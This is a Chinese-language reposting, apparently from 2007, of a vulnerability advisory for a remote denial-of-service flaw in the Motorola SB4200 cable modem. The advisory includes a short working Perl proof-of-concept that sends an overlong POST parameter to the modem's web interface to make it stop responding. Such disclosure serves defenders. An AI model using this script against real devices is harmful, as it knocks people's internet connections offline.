· 用户注册 · 设为首页 · 加入收藏 · 联系站长 · ·
| 网站首页 | 一条龙 | 版本中心 | 下载中心 | 文章中心 | 本站商城 | 客服联系 | 本站服务 | 网通站点 |

| 一 条 龙 | 仿盛大版 | 变态版本 | 精美网页 | 传奇技术 | 征途技术 | 千年技术 | 其他技术 | 网游新闻 | 病毒防治 | 广告代理 网 通 站

 

| 版本商城 | 流程汇款 | 主机租用 | 空间域名 | 传奇下载 | 其他下载 | 私服工具 | 常用软件 | 汇款方式 | 健康保养 旧版网站 代理加盟  :1050000 在线服务

  
您现在的位置: 冰凉网络 >> 文章中心 >> 病毒防治 >> 正文 今天是:
Motorola SB4200远程拒绝服务漏洞
作者:冰凉网络    文章来源:冰凉数据中心    点击数:    更新时间:2007-11-6    
           【字体:
BUGTRAQ ID: 20309
CNCAN ID:CNCAN-2006100410

漏洞消息时间:2006-10-03

漏洞起因
异常条件处理失败错误

影响系统
Motorola Cable Modem SB4200

危害
远程攻击者可以利用漏洞对设备进行拒绝服务攻击。

攻击所需条件
攻击者必须访问Motorola Cable Modem。

漏洞信息
Motorola Cable Modem是一款有线Modem设备。
Motorola Cable Modem不正确处理用户提交的畸形数据,远程攻击者可以利用漏洞对设备进行拒绝服务攻击。
提交包含超长字符串的HTTP POST请求,可导致设备停止响应,产生拒绝服务攻击。

测试方法
#!/usr/bin/perl -w
###################################################
# Remote Motorola SB4200 DoS attack.              #
# By Dave Gil.                                    # 
# Infosec Labs                                    #
###################################################

use strict; 
use HTTP::Request::Common qw (POST GET); 
use LWP::UserAgent; 
my $ua = LWP::UserAgent->new(); 
my $url = http://192.168.100.1/; 
my $req = $ua->post( $url, [MfcISAPICommand => 'SecretProc', Secret => 'A' x int rand(4000)]);

print The DoS has been sent.;
exit();

厂商解决方案
目前没有详细解决方案提供,请关注以下链接:
http://broadband.motorola.com/noflash/sb4200.html

漏洞提供者
CIRT.DK

漏洞消息链接
http://www.securityfocus.com/bid/20309

漏洞消息标题
Motorola SB4200 Remote Denial of Service Vulnerability
文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
    • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    版权归属:Copyright 2004-2008『冰凉网络』官方主页 All Rights Reserved.  技术支持QQ:23567
     客服联系QQ:1050000 Email:1050000@qq.com  联系电话(0)13536724023     粤ICP备05070838号